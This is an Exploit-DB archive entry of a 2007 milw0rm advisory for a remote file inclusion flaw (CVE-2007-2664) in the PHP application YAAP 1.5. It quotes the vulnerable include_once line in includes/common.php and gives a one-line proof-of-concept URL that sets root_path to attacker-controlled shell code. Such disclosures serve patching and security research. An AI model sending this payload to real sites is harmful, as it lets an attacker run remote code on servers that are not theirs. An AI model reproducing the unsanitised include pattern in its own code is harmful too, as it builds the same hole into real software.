YAAP <= 1.5 __autoload Remote File Inclusion Vulnerability

2007-05-12T00:00:00
ID EDB-ID:3908
Type exploitdb
Reporter 3l3ctric-Cracker
Modified 2007-05-12T00:00:00

Description

YAAP <= 1.5 __autoload() Remote File Inclusion Vulnerability. CVE-2007-2664. Webapps exploit for php platform

                                        
                                            --------------------------------------------------------------------------------
Script name.......:Yaap
Affected Version.....:1.5
D.page..:http://yaap.oskbraniewo.pl/download/yaap_15.tar.gz
--------------------------------------------------------------------------------
Author:3l3ctric-Cracker  (Dr Max Virus) :D
Contact:drmaxvirus@w.cn
--------------------------------------------------------------------------------
Bug in:\public_html\includes\common.php
Vul Code:
include_once($root_path.'/classes/'.$class_name.'.php');
----------------------------------------------------------------------------------
POC:
http:[target]/[path]/includes/common.php?root_path=ShellCode
-----------------------------------------------------------------------------------

# milw0rm.com [2007-05-12]